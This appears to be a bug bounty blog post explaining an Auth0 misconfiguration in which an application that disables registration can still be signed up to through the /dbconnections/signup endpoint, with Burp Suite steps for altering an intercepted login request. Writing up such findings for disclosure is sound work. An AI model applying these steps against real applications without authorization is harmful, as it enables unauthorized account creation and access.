Auth0 Misconfig Got me 1600$ on bugcrowd.

Nauman Khan
3 min readApr 14, 2024

--

In the world of online security, even a small oversight can lead to significant vulnerabilities.

I am Nauman Khan an independent security researcher and bug bounty hunter from Aurangabad Maharashtra 🇮🇳 India .

Today, we’ll explore a common misconfiguration related to Auth0, a popular authentication platform, and its potential impact on application security.

What is Auth0?

Auth0 is an authentication platform widely used by websites and applications to manage user identities and ensure secure access to their services. It offers various workflows to integrate login and registration processes seamlessly.

The Misconfiguration:

When creating a new application in Auth0, the registration option is enabled by default. This default setting can pose a security risk if not properly configured. If a system has disabled registration but implements Auth0, it may be possible to bypass this restriction.

credit : Clear-Gate.com

The Exploitation Process:

Exploring the Auth0 authentication API documentation, we discovered an endpoint that allows users to sign up via the Auth0 API using a POST request to /dbconnections/signup. This endpoint requires specific parameters:

  • client_id: A unique identifier for the application requesting access to Auth0 services.
  • connection: Specifies the identity provider for authentication.
  • email: The user’s email address.
  • password: The desired password adhering to the configured password policy.

Steps to Reproduce:

  • Visit the login page of the application.
  • Enter a dummy email and password in the login form.
  • Begin intercepting the request using Burp Suite.
  • Click the submit button to send the login request.
credit : Clear-Gate.com
  • Analyze the intercepted login request in Burp Suite to extract the following parameters: client_id , connection, and other needed param values.
  • Send the intercepted request to the Repeater tool in Burp Suite.
  • Change the request path from /usernamepassword/login to /dbconnections/signup.
  • Modify the parameter name from username to email in the request body (since the endpoint accepts an email parameter only).
credit : Clear-Gate.com
  • Send the modified request to create an account.
  • Use the newly created credentials to log in to the application.

By following these steps, an attacker can exploit the misconfiguration in Auth0 and bypass the intended registration mechanism, creating an unauthorized account and gaining access to the application.

The Impact:

This misconfiguration can allow unauthorized account creation, potentially granting access to sensitive data or functionalities. By exploiting this vulnerability, attackers can bypass the intended security measures and gain unauthorized access to the application.

--

--

Nauman Khan
Nauman Khan

Written by Nauman Khan

Security Researcher | Bug Hunt3er | Junior Penetration Tester

Responses (10)